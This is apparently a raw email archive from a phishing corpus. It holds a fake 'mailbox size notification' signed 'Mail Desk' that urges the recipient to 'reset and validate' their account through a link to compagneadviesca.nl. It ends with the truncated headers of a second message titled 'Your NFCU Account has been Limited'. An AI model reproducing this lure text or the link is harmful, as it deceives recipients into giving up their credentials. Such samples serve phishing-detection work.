From: Carmen Brugman <carmen.brugman@chsfl.org>
Subject: Your mailbox size notification
Thread-Topic: Your mailbox size notification
Thread-Index: AdEbANIBOyvAb1tNTaa5RGWkk83Qag==
Date: Mon, 9 Nov 2015 15:11:02 +0000
Message-ID: <C5D0FCFD4D60E04DA875F2E69371684B18A0554C@000Exchange2010.chs.local>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
x-originating-ip: [172.18.19.6]
Content-Type: multipart/alternative;
	boundary="_000_C5D0FCFD4D60E04DA875F2E69371684B18A0554C000Exchange2010_"
MIME-Version: 1.0
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 242

--_000_C5D0FCFD4D60E04DA875F2E69371684B18A0554C000Exchange2010_
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Your mailbox size notification

Your email account has used 23.7 GB (95%) of 25 GB.

You will be unable to send and receive messages if you do not reset your ac=
count storage space to a higher limit.

Click Manage<http://compagneadviesca.nl/web> to reset and validate your acc=
ount.

Mail Desk


--_000_C5D0FCFD4D60E04DA875F2E69371684B18A0554C000Exchange2010_
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<html xmlns:v=3D"urn:schemas-microsoft-com:vml" xmlns:o=3D"urn:schemas-micr=
osoft-com:office:office" xmlns:w=3D"urn:schemas-microsoft-com:office:word" =
xmlns:m=3D"http://schemas.microsoft.com/office/2004/12/omml" xmlns=3D"http:=
//www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dus-ascii"=
>
<meta name=3D"Generator" content=3D"Microsoft Word 15 (filtered medium)">
<style><!--
/* Font Definitions */
@font-face
	{font-family:"Cambria Math";
	panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
	{font-family:Calibri;
	panose-1:2 15 5 2 2 2 4 3 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
	{margin:0cm;
	margin-bottom:.0001pt;
	font-size:11.0pt;
	font-family:"Calibri",sans-serif;
	mso-fareast-language:EN-US;}
a:link, span.MsoHyperlink
	{mso-style-priority:99;
	color:#0563C1;
	text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
	{mso-style-priority:99;
	color:#954F72;
	text-decoration:underline;}
span.EmailStyle17
	{mso-style-type:personal-compose;
	font-family:"Calibri",sans-serif;
	color:windowtext;}
span.apple-converted-space
	{mso-style-name:apple-converted-space;}
.MsoChpDefault
	{mso-style-type:export-only;
	font-size:10.0pt;
	font-family:"Calibri",sans-serif;
	mso-fareast-language:EN-US;}
@page WordSection1
	{size:612.0pt 792.0pt;
	margin:72.0pt 72.0pt 72.0pt 72.0pt;}
div.WordSection1
	{page:WordSection1;}
--></style><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext=3D"edit" spidmax=3D"1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext=3D"edit">
<o:idmap v:ext=3D"edit" data=3D"1" />
</o:shapelayout></xml><![endif]-->
</head>
<body lang=3D"EN-GB" link=3D"#0563C1" vlink=3D"#954F72">
<div class=3D"WordSection1">
<p class=3D"MsoNormal"><span style=3D"font-family:&quot;Arial&quot;,sans-se=
rif;color:#222222">Your mailbox size notification<o:p></o:p></span></p>
<p class=3D"MsoNormal"><span style=3D"font-family:&quot;Arial&quot;,sans-se=
rif;color:#222222"><o:p>&nbsp;</o:p></span></p>
<p class=3D"MsoNormal"><span style=3D"font-family:&quot;Arial&quot;,sans-se=
rif;color:#222222">Your email account has used 23.7 GB (95%) of 25 GB.&nbsp=
;<o:p></o:p></span></p>
<p class=3D"MsoNormal"><span style=3D"font-family:&quot;Arial&quot;,sans-se=
rif;color:#222222"><o:p>&nbsp;</o:p></span></p>
<p class=3D"MsoNormal"><span style=3D"font-family:&quot;Arial&quot;,sans-se=
rif;color:#222222">You will be unable to send and receive messages if you d=
o not reset your account storage space to a higher limit.<o:p></o:p></span>=
</p>
<p class=3D"MsoNormal"><span style=3D"font-family:&quot;Arial&quot;,sans-se=
rif;color:#222222"><o:p>&nbsp;</o:p></span></p>
<p class=3D"MsoNormal"><span style=3D"font-family:&quot;Arial&quot;,sans-se=
rif;color:#222222">Click<span class=3D"apple-converted-space">&nbsp;</span>=
<a href=3D"http://compagneadviesca.nl/web" target=3D"_blank"><span style=3D=
"color:#1155CC">Manage</span></a><span class=3D"apple-converted-space">&nbs=
p;</span>to
 reset and validate your account.<o:p></o:p></span></p>
<p class=3D"MsoNormal"><span style=3D"font-family:&quot;Arial&quot;,sans-se=
rif;color:#222222">&nbsp;<o:p></o:p></span></p>
<p class=3D"MsoNormal"><span style=3D"font-family:&quot;Arial&quot;,sans-se=
rif;color:#222222">Mail Desk<o:p></o:p></span></p>
<p class=3D"MsoNormal"><o:p>&nbsp;</o:p></p>
</div>
</body>
</html>

--_000_C5D0FCFD4D60E04DA875F2E69371684B18A0554C000Exchange2010_--

From jose@monkey.org Tue Nov 10 12:12:26 2015 +0000
Return-Path: navyfcui@sccu4u.com
Delivered-To: jose@monkey.org
X-FDA: 70838578692.13.map88_4f7374b10761f
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 89,8.8,0,24b43c41a3144c94,d41d8cd98f00b204,navyfcui@sccu4u.com,:navyfcui@sccu4u.com,RULES_HIT:41:72:379:967:969:978:979:983:988:989:1208:1221:1254:1260:1263:1313:1314:1381:1394:1395:1431:1437:1516:1517:1518:1534:1541:1575:1594:1699:1711:1714:1730:1777:1792:2194:2199:2525:2527:2540:2560:2563:2612:2682:2685:2693:2741:2859:2890:2901:2902:2903:2906:2911:2918:2921:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3350:3421:3590:3690:3740:3865:3866:3867:3868:3870:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4321:4361:4362:4383:4425:5007:6261:6684:6687:6688:7809:7903:8509:8603:8784:9025:9108:9153:9388:9873:9908:10014:10021:10049:10214:10346:10400:11537:11658:11914:12043:12295:12438:12555:12561:12776:13046:13139:13163:13229:13237:14094:14096:21080:30001:30026:30051:30054:30055:30069:30070,0,RBL:69.95.226.11:@sccu4u.com:.lbl8.mailshell.net-62.8.0.100 66.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,
X-HE-Tag: map88_4f7374b10761f
X-Filterd-Recvd-Size: 3307
Received: from smtp001.earthlinkbusiness.com (smtp001.earthlinkbusiness.com [69.95.226.11])
	by imf03.b.hostedemail.com (Postfix) with SMTP
	for <jose@monkey.org>; Tue, 10 Nov 2015 12:12:25 +0000 (UTC)
Received: (qmail 16900 invoked from network); 10 Nov 2015 12:12:24 -0000
Received: from unknown (HELO BMSRDP.sullivaninsurance.com) (155.212.5.3)
  by smtp001.onecommunications.net with SMTP; 10 Nov 2015 12:12:24 -0000
Content-Type: multipart/alternative; boundary="===============0678447156=="
MIME-Version: 1.0
Subject: Your NFCU Account has been Limited
To: Recipients <navyfcui@sccu4u.com>
